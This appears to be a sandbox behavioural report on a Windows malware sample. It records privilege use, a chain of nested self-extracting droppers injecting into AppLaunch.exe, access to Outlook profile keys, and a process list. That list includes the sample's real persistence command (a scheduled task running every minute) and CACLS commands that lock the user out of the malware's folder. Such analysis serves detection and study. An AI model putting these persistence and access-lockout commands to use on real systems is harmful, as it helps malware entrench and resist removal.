Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\953A.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5344.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 880 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe
PID 880 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe
PID 880 wrote to memory of 4356 N/A C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe
PID 4356 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe
PID 4356 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe
PID 4356 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe
PID 644 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe
PID 644 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe
PID 644 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe
PID 3824 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe
PID 3824 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe
PID 3824 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe
PID 1596 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe
PID 1596 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe
PID 1596 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe
PID 4784 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe
PID 4784 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe
PID 4784 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4784 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe
PID 4784 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe
PID 4784 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1936 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1596 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe
PID 1596 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe
PID 1596 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe
PID 3824 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe
PID 3824 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe
PID 3824 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5108 wrote to memory of 3868 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 644 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe
PID 644 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe
PID 644 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe
PID 1780 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1780 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1780 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4356 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe
PID 4356 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe
PID 4356 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe
PID 2736 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2736 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\40F2.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe

"C:\Users\Admin\AppData\Local\Temp\1683c438c813733a324aba4dc75fd5d9923538aa41e16ad9e11e422d6ed8bc77.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fW6dc11.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\iq5Yd73.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xE2nG14.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TA1NW08.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gm9Tl08.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Jw97Hn3.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2ra5653.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3hY38Ib.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2524 -ip 2524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4WX861vQ.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5LA0Qy2.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6YX3Uu6.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7mK1fU19.exe

